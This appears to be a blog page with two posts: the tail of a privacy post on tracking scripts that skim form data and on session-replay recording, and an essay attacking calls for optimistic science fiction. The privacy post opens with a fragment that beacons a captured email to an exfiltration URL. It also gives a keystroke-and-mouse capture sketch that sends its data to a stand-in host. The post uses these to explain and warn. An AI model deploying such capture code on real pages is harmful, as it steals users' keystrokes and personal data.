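      navigator.sendBeacon(exfilUrl, JSON.stringify({ id: email.value }));
    }
    form.remove();
  }, 1000);
}
```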

This is way beyond standard "tracking" and well into personal data theft. If you're not already using an external password manager, I suggest you start now. There are plenty of options out there like 1Password, Bitwarden or KeepassX.

Meanwhile, session replay scripts are also grabbing personal information from pages they're installed on. If you don't know what these are (and, unless you work in online marketing, there's little reason to), the linked article describes them accurately:

You may know that most websites have third-party analytics scripts that record which pages you visit and the searches you make. But lately, more and more sites use “session replay” scripts. These scripts record your keystrokes, mouse movements, and scrolling behavior, along with the entire contents of the pages you visit, and send them to third-party servers. Unlike typical analytics services that provide aggregate statistics, these scripts are intended for the recording and playback of individual browsing sessions, as if someone is looking over your shoulder.
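Stripped to its essentials, a session-replay collector is just a handful of event listeners. A minimal sketch—the collector endpoint is made up, and real scripts are far more elaborate:

```typescript
// Stripped-down session replay: capture keystrokes, mouse movement and
// scrolling, then ship batches to a third-party collector.
type ReplayEvent =
  | { kind: "key"; key: string; t: number }
  | { kind: "move"; x: number; y: number; t: number }
  | { kind: "scroll"; y: number; t: number };

const buffer: ReplayEvent[] = [];

document.addEventListener("keydown", (e) =>
  buffer.push({ kind: "key", key: e.key, t: Date.now() })
);
document.addEventListener("mousemove", (e) =>
  buffer.push({ kind: "move", x: e.clientX, y: e.clientY, t: Date.now() })
);
document.addEventListener("scroll", () =>
  buffer.push({ kind: "scroll", y: window.scrollY, t: Date.now() })
);

// Real scripts also serialize the page's DOM so the whole session can be
// replayed visually, which is how on-page personal data ends up leaking.
setInterval(() => {
  if (buffer.length > 0) {
    navigator.sendBeacon("https://replay.example/collect", JSON.stringify(buffer));
    buffer.length = 0;
  }
}, 5000);
```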

Unlike the deliberately malicious ad targeting scripts mentioned above, the session replay ones attempt to automatically redact sensitive information or require their users to manually do so. This is not enough, and sensitive information can be transmitted and stored by these services:

Collection of page content by third-party replay scripts may cause sensitive information such as medical conditions, credit card details and other personal information displayed on a page to leak to the third-party as part of the recording. This may expose users to identity theft, online scams, and other unwanted behavior. The same is true for the collection of user inputs during checkout and registration processes.

If you're not using privacy plugins in your browser, you should start right now. Install an ad blocker; my personal favourite is uBlock Origin. Then install an extra tracker-blocking plugin like Disconnect.me or Privacy Badger.


Denying Dystopia: The Hope Police in Fact and Fiction

1 Comment

I recently read Terri Favro’s upcoming book on the history and future of robotics, sent to me by a publisher hungry for blurbs. It’s a fun read— I had no trouble obliging them—  but I couldn’t avoid an almost oppressive sense of— well, of optimism hanging over the whole thing. Favro states outright, for example, that she’s decided to love the Internet of Things; those who eye it with suspicion she compares to old fogies who stick with their clunky coal-burning furnace and knob-and-tube wiring as the rest of the world moves into a bright sunny future. She praises algorithms that analyze your behavior and autonomously order retail goods on your behalf, just in case you’re not consuming enough on your own: “We’ll be giving up our privacy, but gaining the surprise and delight that comes with something new always waiting for us at the door” she gushes (sliding past the surprise and delight we’ll feel when our Visa bill loads up with purchases we never made). “How many of us can resist the lure of the new?” She does pay lip service to the potential hackability of this  Internet of Things— concedes that her networked fridge might be compromised, for example—  but goes on to say  “…to do what, exactly? Replace my lactose-free low-fat milk with table cream? Sabotage my diet by substituting chocolate for rapini?”

Maybe, yeah. Or maybe your insurance company might come snooping around in the hopes your eating habits might give them an excuse to reject your claim for medical treatments you might have avoided if you’d “lived more responsibly”. Maybe some botnet will talk your fridge and a million others into cranking up their internal temperatures to 20ºC during the day, then bringing them all back down to a nice innocuous 5º just before you get home from work. (Botulism in just a few percent of those affected could overwhelm hospitals and take out our medical response capacity overnight.) And while Favro at least admits to the danger of Evil Russian Hackers, she never once mentions that our own governments will in all likelihood be rooting around in our fridges and TVs and smart bulbs, cruising the Internet of Things while whistling that perennial favorite, If You Got Nothin’ to Hide You Got Nothin’ to Fear.

Nor should we forget that old chestnut from Blue Lives Murder: “I had to shoot him, Your Honor. I feared for my life. It’s true the suspect was unarmed at the time, but he’s well over six feet tall and according to his Samsung Health app he lifted weights and ran 20K three times a week…”

That’s just a few ways your wired appliances can hurt you personally. We haven’t scratched the potential damage to wider targets. What’s to stop them from getting conscripted into an appliance-based botnet like, for example,  the one that took out KrebsOnSecurity last year?

I’m not trying to shit on Favro; as I said, I enjoyed the book. But it did get me thinking about bigger pictures, and this recent demand for brighter prognoses.  These days it seems as if everyone and their dog is demanding we stick our fingers in our ears, squeeze our eyes tight shut, and whistle a happy tune while the mountainside collapses on top of us.

In a sense this is nothing new. Denial is a ubiquitous part of human nature. One of the things science fiction has traditionally done has been to get in our faces, hold our eyelids open and force us to look at the road ahead. That’s a big reason I was drawn to the field in the first place.

So how come some of the most strident demands to Lighten the Hell Up are coming from inside science fiction itself?

*

It started slow. Remember back at the beginning of the decade, when the president of Arizona State University told Neal Stephenson that the sorry state of the space program was our fault? Science fiction wasn’t bold and optimistic like it used to be, apparently. It had stopped Dreaming Big. The rocket scientists weren’t inspired because we weren’t being sufficiently inspirational.

Are we saving the world yet?

I’ve always found that argument a bit tenuous, but Stephenson took it to heart. Booted up “Project Hieroglyph“, a big shiny movement devoted to chasing dystopia down into the cellar and replacing it with upbeat, optimistic science fiction that could Change The World. The fruit of that labor was Hieroglyph: Stories and Visions for a Better Future; a number of my friends can be found within its pages, although for some reason I was not approached for a contribution. (No problem— I got my shot just this year when Kathryn Cramer, the coeditor of H:SaVfaBF, let me write my own piece of optiskif for the X-Prize’s Seat 14C.)

A few grumbled (Ramez Naam struck back in Slate in defense of dystopias). Others dug in their heels: You don’t need to squint very hard to figure out Michael Solana’s take-home message in “Stop Writing Dystopian Fiction – It’s Making Us All Fear Technology“. That appeared in Wired back in 2014, but the bandwagon rolls on still. Just this year, writing in Clarkesworld, my dear friend Kelly Robson put her foot down: “No more dystopias [italics hers]. What we need is near- and mid-future stories that show an array of trajectories out of the gloomy toilet bowl we’re spiraling.”

There’s something telling about that edict, insofar as it explicitly admits that yes, we are indeed circling the drain. We’re all on that same page, at least. But what the hope police[1] seem to be converging on is, You don’t get to give us bad news unless you can also tell us how to make it good. Don’t you dare deliver a diagnosis of cancer unless you’ve got a cure stashed up your sleeve, because otherwise you’re just being a downer.

Looks like dangerous seas up ahead. I know! Let’s erase all the reefs from our nautical charts![2]

*

Inherent in this attitude is the belief that science fiction matters, that it can influence the trajectory of real life, that We Have The Power To Change the Future and With Great Power Goes Great Responsibility— so if we serve up an unending diet of crushing dystopias people will lose all hope, melt into whimpering puddles of flop sweat, and grow too paralyzed to fix anything. Because the World takes us so very seriously. Because if we do not tell tales of hope, then we have no one to blame but ourselves when the ceiling crashes in.

I’ve always been a bit gobsmacked by the arrogance of that view.

I’m not saying that SF has never proven inspirational in real life. NASA is infested with scientists and engineers who were weaned on Star Trek. Gibson informed the future as much as he imagined it. Hell, we wouldn’t have the glorious legacy of Reagan’s Strategic Defense Initiative if a bunch of Real SF Writers hadn’t snuck into the White House and inspired the Gipper with hi-tech tales of space-based missile shields and ion cannons. I’m not denying any of that.

What I’m saying is that none of those things inspired people to change. It merely justified their inclination to keep on doing what they’d always wanted to. Science fiction is like the Bible that way: it’s big enough, and messy enough, to let you cherry-pick “inspiration” for pretty much any paradigm that turns your crank. Hell, you can even use SF to justify a society based on incest (check out the works of Theodore Sturgeon if you don’t believe me). That’s one of the reasons I like the genre; you can go anywhere.

You want to convince me that SF can change the world? Show me the timeline where we headed off overpopulation because people read Stand on Zanzibar. Show me a world where the existence of Nineteen Eighty-Four prevented the US and Britain from routinely surveilling their citizens. Show me a place where ‘Murrica read The Handmaid’s Tale and whispered in horrified tones: “Holy shit, we really gotta dial back our religious fundamentalism.”

It’s no accomplishment to inspire people to do things they already want to. You want to lay claim to being part of Team Worldchanger, show me a time when you inspired people to do something they didn’t want to. Show me a time you changed society’s mind.

Ray Bradbury tried to imagine such a world, once— late in his career when he’d gone soft, when hard-edged masterpieces like “Skeleton” and  “The Small Assassin” were lost to history and all he had left in him were mushy stories about Laurel and Hardy, or time-travelers who used their technology to go back and make Herman Melville feel better about his writing career. This particular story was called “The Toynbee Convector”, and it was about a guy who saved the world by lying to it. He told everyone that he’d built a time machine, gone into the Future, and seen that It Was Good: we’d cleaned up the planet, saved the whales, eliminated poverty and overpopulation. And in this upbeat science fiction story, people didn’t say Great: well, since we know everything’s gonna be okay anyhow, we might as well keep sitting on our asses, snarfing pork rinds until Utopia comes calling. No, they rolled up their sleeves, and by golly they set about making that future happen. I don’t know if I’ve ever read a story more willfully blind to Human Nature.

If you’re looking for ways in which science fiction can inspire, here’s something the hope police may have forgotten to mention: if downbeat stories inspire despair and paralysis, it’s at least as likely that upbeat stories inspire complacency. Yeah, I know the planet’s warming and the icecaps are melting and we’re wiping out sixty species a day, but I’m sure we’ll muddle through somehow. We’re a resourceful species when the chips are down. Someone will come up with something. I read it in a book by Kim Stanley Robinson.

*

In fact, Kim Stanley Robinson is a good example. He’s no misty-eyed Utopian by any stretch, but he’s certainly more hopeful in his imaginings than the Atwoods and Brunners of the world. He recently pointed to the Paris Agreement as a “hopeful sign“:

It was a historical moment that will go down in any competent world history … That moment when the United Nations member states said, “We have to put a price on carbon. We have to go beyond capitalism and regulate our entire economy and our technological base in order to keep the planet alive.”

Surely I can’t be the only one who sees the oxymoron in “put a price on carbon … go beyond capitalism”. The moment you affix a monetary value to carbon you’re subsuming it into capitalism. You’re turning it into just another commodity to be bought and sold.

Don’t worry! Be happy!

Granted, this is better than pretending it doesn’t exist (I believe “externalities” is the term economists use when they want to ignore something completely). And Robinson is no fan of conventional economics: he dismissed the field as “pseudoscience” at Readercon a few years back, which was heartening even if it is so obvious you shouldn’t have to keep coming out and saying it. But the moment you put a price on carbon, it’s only a matter of time before some asshole shows up with a checkbook and says “OK— here’s your price, paid in full. Now fuck off while I continue to destroy the world in time for the next quarterly report.” Putting a price on carbon is the exact opposite of moving beyond capitalism; it’s extending capitalism into new and more dangerous realms.

Citing such developments as positive makes me a bit queasy.

I got the same kind of feeling when everyone dog-piled all over David Wallace-Wells’ “The Uninhabitable Earth” in New York Magazine this past summer. Wallace-Wells’ bottom line was that even the bad news you’ve heard about climate change is a soft-sell, that things are even worse than the experts are admitting, that in all likelihood large parts of the planet will be uninhabitable for humans by the end of this century.

It took about three hours for the yay-sayers to start weighing in, tearing down that gloomy-Gus perspective. They tried to pick holes in the science, although ultimately they had to admit that there weren’t many. The main complaint was that Wallace-Wells always assumes the worst-case scenario— and really, things probably won’t get that bad. Even Michael Mann, one of Climate Change’s biggest rock stars, weighed in: “There is no need to overstate the evidence, particularly when it feeds a paralyzing narrative of doom and hopelessness.” This turned out to be the most common criticism: not that the article was necessarily wrong overall, but that it was just too depressing, too defeatist. Have to give people hope, you know. Have to stop being all doom-and-gloom and start inspiring instead.

I have a few problems with this. First: Sorry, but when you’re driving for the edge of a cliff with your foot literally on the gas, I don’t think “inspiration” is what we should be going for. We should be going for sheer pants-pissing terror at the prospect of what happens when we go over that cliff. I humbly suggest that that might prove a better motivator.

Further, describing the worst-case scenario isn’t unreasonable when the observed data keep converging on something even worse. Science, by nature, is conservative; a result isn’t even considered statistically significant below a confidence level of 95%, often 99%. Global systems are full of complexity and noise, things that degrade statistical significance even in the presence of real effects— so scientific publications, almost by definition, tend to understate risk.

Which might explain why, once we were finally able to collect field data to weigh against decades of computer projections, the best news was that observed CO2 emissions were only tracking the predicted worst-case scenario. Ice-cap melting and sea-level rise were worse than the predicted worst-case— and from what I can tell this is pretty typical. (I’ve been checking in on the relevant papers in Science and Nature since before the turn of the century, and I can remember maybe two papers in all that time that said Hey, this variable actually isn’t as bad as we thought!)

So saying that Wallace-Wells takes the worst-case scenario isn’t a criticism. It’s an endorsement. If anything, the man understates our predicament. Which made it a bit troubling to see even Ramez Naam— defender of dystopian fiction— weighing in against the New York piece. Calling it “bleak” and “misleading”, he accused Wallace-Wells of “underestimat[ing] Human ingenuity” and “exaggerat[ing] impacts”. He spoke of trend lines for anticipated temperature rise bending down, not up— and of course, he lamented the hopeless tone of the article which would, he felt, make it psychologically harder to take action.

I’m not sure where Ramez got his trend data— it doesn’t seem entirely consistent with what those Copenhagen folks had to say a few years back— but even if he’s right, it’s a little like saying Yes, we may be a hundred meters away from running into that iceberg, but over the past couple of hours we’ve actually managed to change course by three whole degrees! Progress! At this rate we’ll be able to miss the iceberg entirely in just another three or four kilometers!

*

I don’t mean to pick on Ramez, any more than on Favro— having recently hung out with him, I can attest that he is one smart and awesome dude. But. Try this scenario on for size:

You’re in your living room, watching Netflix. You look out the window and see a great honking boulder plunging down the hill, mere seconds from smashing your home to kindling. Do you:

  1. Crumple into a ball of weeping despair and wait for the end;
  2. Keep watching Stranger Things because that boulder is just a Chinese hoax;
  3. Wait for someone to inspire you to action with tales of a hopeful future; or
  4. Run like hell, even though it means abandoning your giant flatscreen TV?

This underscores, I believe, a potential flaw in the worldview of the hope police. It may be that despair and hopelessness reduce us to inaction— but it may also be true that we simply aren’t scared enough. You can thank our old friend Hyperbolic Discounting for that: the future is never all that real to us, not down in the gut where we set our priorities. Catastrophe in ten years is less real than discomfort today. So we put off the necessary steps. We slide towards apocalypse because we can’t be bothered to get off the couch. The problem is not that we are paralyzed with despair; the problem, more likely, is that we haven’t really internalized what’s in store for us. The problem is that our species is already delusionally optimistic by nature.
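Hyperbolic discounting even has a standard formula, V = A / (1 + kD): the felt value V of an outcome of size A shrinks the further away (D) it is. A toy illustration of why the couch wins—the numbers and the discount rate k are mine, purely for illustration:

```typescript
// Hyperbolic discounting in the standard Mazur form V = A / (1 + k * D).
// Amounts and k are illustrative only.
function feltValue(amount: number, delayYears: number, k = 1.0): number {
  return amount / (1 + k * delayYears);
}

const catastropheInTenYears = feltValue(1_000_000, 10); // feels like ~90,909
const couchComfortNow = feltValue(100_000, 0); // feels like 100,000
// The trivial-but-immediate comfort outweighs the huge-but-distant loss,
// which is exactly the can't-be-bothered-to-get-off-the-couch problem.
```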

Not all of us, mind you. Some folks perceive their contextual status with relative accuracy: they’re better than the rest of us at figuring out how much control they really have over local events, for example. They’re better at assessing their own performance at assigned tasks. Most of us tend to take credit for the good things that happen to us, while blaming something else for the bad. But some folks, faced with the same scenarios, apportion blame and credit without that self-serving bias.

We call these people “clinically depressed”. We regard them as a bunch of unmotivated Debbie Downers who always look on the dark side— even though their worldview is empirically more accurate than the self-serving ego-boosts the rest of us experience.

Judged on that basis, chances are that even most dystopias are too optimistic. Telling us that we need to be more optimistic is like telling an already-drunk driver to have another mickey for the road. More hope and sunshine may be the last thing we need; just maybe, what we need is to catch sight of that boulder crashing down the hill, and to believe it. Maybe that might be enough to get us moving.

*

The distribution isn’t a clean bimodal. Sure, there’s a clump of us here at the Grim Dystopia end of the scale, and another clump way over there at the Power of Positive Thinking. But there’s this other place between those poles, a place that mixes light and dark. A place whose citizens say You may not like it but it’s gonna happen anyway, so why not just settle back and enjoy the ride?

I see it when Terri Favro waves away the implications of smart homes that drain our savings into the coffers of retailers we never met in exchange for products we never asked for, with a shrug and a cheery  “How many of us can resist the lure of the new?” I see it when I read articles in Wired that rail against our ongoing loss of privacy, only to finally admit “We are not going to retreat from the cloud… We live there now.” Or that more recent piece— just a couple of months back— which begins with ominous descriptions of China’s truly pernicious Social Scoring program, segues into it’s-not-all-bad Territory (Hey, at least it’s more transparent than our own No-Fly Lists), and finishes off with the not-so-subtle implication that it’ll probably happen here too before long, so we might as well get used to it.

It’s almost as though some Invisible Hand were drawing us in by expressing our worst fears, validating them to engender trust— and then gently herding us toward passive acceptance of the inevitable. “We’ll be giving up our privacy, but gaining the surprise and delight that comes with something new always waiting for us at the door!” Can’t ask for more than that.

Not unless you want to end up on the wrong kind of list, anyway.

*

These aren’t huge leaps.  Inspiration Not Despair segues into Look on the Bright Side which circles ever closer to Accept and Acquiesce.  There are, after all, a lot of interests who don’t want us to believe in that boulder crashing down the hill— and if said boulder becomes ever-harder to deny, then at least they can try to convince us that it really isn’t so bad, that we’ll learn to like the boulder even if ends up squashing a few things we used to value.  There’s always a bright side. The planet may be warming, but it’s not warming as fast! Just another few kilometers and we’ll be past that iceberg! See, we’ve even put a price on carbon!

Of course, if you really need to blame someone, look no further than those naysayers over in the corner; they’re the ones who didn’t Dream Big enough, after all. They’re the ones who failed to Inspire the rest of us. Don’t blame us when the boulder squashes you flat; blame them, for “making us all fear technology”. Blame them, for failing to “show an array of trajectories out of the gloomy toilet bowl we’re spiraling”.

In fact, why wait until the boulder actually hits?

Blame them now, and avoid the rush.

 


[1] To borrow a brilliant term from David Roberts, whose piece in Vox ably defends Wallace-Wells’ prognosis.

[2] If you want a cinematic example of this mindset, check out  Roberto Benigni’s insipid 1997 film “Life is Beautiful“, whose take-home message is that the best way to ensure your children’s survival in a Nazi death camp is to trick them into thinking that it’s all just a game and nothing can possibly hurt them.
